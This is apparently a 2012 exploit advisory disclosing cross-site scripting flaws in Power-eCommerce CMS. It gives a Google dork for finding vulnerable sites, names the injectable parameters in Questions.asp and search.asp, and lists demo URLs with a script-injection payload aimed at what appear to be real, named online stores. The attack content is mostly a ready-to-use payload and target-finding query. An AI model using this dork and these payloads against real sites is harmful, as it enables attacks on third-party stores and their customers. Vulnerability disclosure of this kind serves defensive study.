###################################################################################

# Exploit Title: Power-eCommerce CMS Cross Site Scripting Vulnerability
#
# Google Dork:intext:"Site Powered by: Power-eCommerce.com"
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home : http://www.power-ecommerce.com/
#
# Tested on: all
#
###################################################################################

 
========================================
id parametr in Questions.asp and 7 in search.asp are Vulnerable to xss 

D3M0 : 
 
http://store.harptennis.com//Questions.asp?id="><script>alert(0);</script>
http://store.harptennis.com/search.asp?7="><script>alert(0);</script>&Search=Search

http://www.cheaphpprinters.com/search.asp?7="><script>alert(0);</script>&Search=Search

 
===============Crim3R@Att.Net===========

$home = %00
thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir